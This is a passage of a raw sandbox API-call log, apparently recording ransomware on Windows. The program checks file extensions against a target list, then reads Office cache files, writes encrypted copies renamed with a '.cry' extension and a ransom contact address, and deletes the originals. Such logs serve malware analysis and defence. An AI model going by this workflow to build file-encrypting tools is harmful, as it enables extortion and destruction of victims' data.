(lpString=".zip") returned 4 [0035.418] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString=".rar") returned 4 [0035.418] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString=".bz2") returned 4 [0035.418] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString=".7z") returned 3 [0035.418] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0035.418] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.418] lstrlenW (lpString=".dbf") returned 4 [0035.418] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString=".1cd") returned 4 [0035.419] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0035.419] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString=".jpg") returned 4 [0035.419] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString=".doc") returned 4 [0035.419] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString=".docx") returned 5 [0035.419] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0035.419] lstrlenW (lpString=".pdf") returned 4 [0035.419] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString=".xls") returned 4 [0035.419] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString=".xlsx") returned 5 [0035.419] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0035.419] lstrlenW (lpString=".ppt") returned 4 [0035.419] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString=".zip") returned 4 [0035.419] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString=".rar") returned 4 [0035.419] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString=".bz2") returned 4 [0035.419] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString=".7z") returned 3 [0035.419] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0035.419] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString=".dbf") returned 4 [0035.419] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0035.419] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString=".1cd") returned 4 [0035.419] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0035.419] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.419] lstrlenW (lpString=".jpg") returned 4 [0035.419] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0035.420] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.420] lstrlenW (lpString="ExcelMUI.xml") returned 12 [0035.420] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0035.547] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1565) returned 1 [0035.547] CloseHandle (hObject=0x184) returned 1 [0035.547] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0035.547] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.547] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0035.547] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.547] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.547] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.549] GetLastError () returned 0x0 [0035.549] ReadFile (in: hFile=0x184, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x61d, lpOverlapped=0x0) returned 1 [0035.588] WriteFile (in: hFile=0x188, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x620, lpOverlapped=0x0) returned 1 [0035.589] ReadFile (in: hFile=0x184, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.589] WriteFile (in: hFile=0x188, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.589] SetEndOfFile (hFile=0x188) returned 1 [0035.589] CloseHandle (hObject=0x188) returned 1 [0035.590] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.590] SetEndOfFile (hFile=0x184) returned 1 [0035.591] CloseHandle (hObject=0x184) returned 1 [0035.591] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.591] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1 [0035.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.591] lstrlenW (lpString=".doc") returned 4 [0035.591] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.591] lstrlenW (lpString=".docx") returned 5 [0035.591] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.591] lstrlenW (lpString=".pdf") returned 4 [0035.591] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.591] lstrlenW (lpString=".xls") returned 4 [0035.591] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.591] lstrlenW (lpString=".xlsx") returned 5 [0035.591] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.591] lstrlenW (lpString=".ppt") returned 4 [0035.591] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.591] lstrlenW (lpString=".zip") returned 4 [0035.591] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.591] lstrlenW (lpString=".rar") returned 4 [0035.591] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.591] lstrlenW (lpString=".bz2") returned 4 [0035.592] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString=".7z") returned 3 [0035.592] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.592] lstrlenW (lpString=".dbf") returned 4 [0035.592] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.592] lstrlenW (lpString=".1cd") returned 4 [0035.592] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.592] lstrlenW (lpString=".jpg") returned 4 [0035.592] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.592] lstrlenW (lpString=".doc") returned 4 [0035.592] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString=".docx") returned 5 [0035.592] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.592] lstrlenW (lpString=".pdf") returned 4 [0035.592] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString=".xls") returned 4 [0035.592] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString=".xlsx") returned 5 [0035.592] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.592] lstrlenW (lpString=".ppt") returned 4 [0035.592] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.592] lstrlenW (lpString=".zip") returned 4 [0035.592] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.592] lstrlenW (lpString=".rar") returned 4 [0035.592] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.592] lstrlenW (lpString=".bz2") returned 4 [0035.593] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.593] lstrlenW (lpString=".7z") returned 3 [0035.593] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.593] lstrlenW (lpString=".dbf") returned 4 [0035.593] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.593] lstrlenW (lpString=".1cd") returned 4 [0035.593] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0035.593] lstrlenW (lpString=".jpg") returned 4 [0035.593] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.593] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.593] lstrlenW (lpString="Setup.xml") returned 9 [0035.593] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0035.593] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2424) returned 1 [0035.593] CloseHandle (hObject=0x184) returned 1 [0035.593] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.593] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.593] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0035.593] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.594] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.594] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.595] GetLastError () returned 0x0 [0035.595] ReadFile (in: hFile=0x184, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x978, lpOverlapped=0x0) returned 1 [0035.620] WriteFile (in: hFile=0x188, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x980, lpOverlapped=0x0) returned 1 [0035.621] ReadFile (in: hFile=0x184, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.621] WriteFile (in: hFile=0x188, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.621] SetEndOfFile (hFile=0x188) returned 1 [0035.621] CloseHandle (hObject=0x188) returned 1 [0035.622] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.622] SetEndOfFile (hFile=0x184) returned 1 [0035.623] CloseHandle (hObject=0x184) returned 1 [0035.623] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.623] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.623] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.623] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.623] lstrlenW (lpString=".doc") returned 4 [0035.623] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.623] lstrlenW (lpString=".docx") returned 5 [0035.623] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.623] lstrlenW (lpString=".pdf") returned 4 [0035.623] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.623] lstrlenW (lpString=".xls") returned 4 [0035.623] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.623] lstrlenW (lpString=".xlsx") returned 5 [0035.623] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.623] lstrlenW (lpString=".ppt") returned 4 [0035.623] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.623] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.623] lstrlenW (lpString=".zip") returned 4 [0035.624] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.624] lstrlenW (lpString=".rar") returned 4 [0035.624] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString=".bz2") returned 4 [0035.624] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString=".7z") returned 3 [0035.624] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.624] lstrlenW (lpString=".dbf") returned 4 [0035.624] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.624] lstrlenW (lpString=".1cd") returned 4 [0035.624] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.624] lstrlenW (lpString=".jpg") returned 4 [0035.624] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.624] lstrlenW (lpString=".doc") returned 4 [0035.624] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString=".docx") returned 5 [0035.624] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.624] lstrlenW (lpString=".pdf") returned 4 [0035.624] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString=".xls") returned 4 [0035.624] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString=".xlsx") returned 5 [0035.624] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.624] lstrlenW (lpString=".ppt") returned 4 [0035.624] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.624] lstrlenW (lpString=".zip") returned 4 [0035.624] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.624] lstrlenW (lpString=".rar") returned 4 [0035.624] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.624] lstrlenW (lpString=".bz2") returned 4 [0035.624] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.625] lstrlenW (lpString=".7z") returned 3 [0035.625] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.625] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.625] lstrlenW (lpString=".dbf") returned 4 [0035.625] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.625] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.625] lstrlenW (lpString=".1cd") returned 4 [0035.625] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.625] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.625] lstrlenW (lpString=".jpg") returned 4 [0035.625] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.625] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.625] lstrlenW (lpString="Proof.xml") returned 9 [0035.625] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.637] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1347) returned 1 [0035.637] CloseHandle (hObject=0x170) returned 1 [0035.637] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 0x2020 [0035.638] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.638] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.638] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.638] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.638] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.638] GetLastError () returned 0x0 [0035.638] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x543, lpOverlapped=0x0) returned 1 [0035.677] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x550, lpOverlapped=0x0) returned 1 [0035.678] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.678] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.678] SetEndOfFile (hFile=0x174) returned 1 [0035.678] CloseHandle (hObject=0x174) returned 1 [0035.679] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.679] SetEndOfFile (hFile=0x170) returned 1 [0035.680] CloseHandle (hObject=0x170) returned 1 [0035.680] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.680] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0035.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.680] lstrlenW (lpString=".doc") returned 4 [0035.680] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.680] lstrlenW (lpString=".docx") returned 5 [0035.680] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.680] lstrlenW (lpString=".pdf") returned 4 [0035.680] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.680] lstrlenW (lpString=".xls") returned 4 [0035.680] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.680] lstrlenW (lpString=".xlsx") returned 5 [0035.680] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.680] lstrlenW (lpString=".ppt") returned 4 [0035.680] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.680] lstrlenW (lpString=".zip") returned 4 [0035.680] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.680] lstrlenW (lpString=".rar") returned 4 [0035.680] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.680] lstrlenW (lpString=".bz2") returned 4 [0035.680] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString=".7z") returned 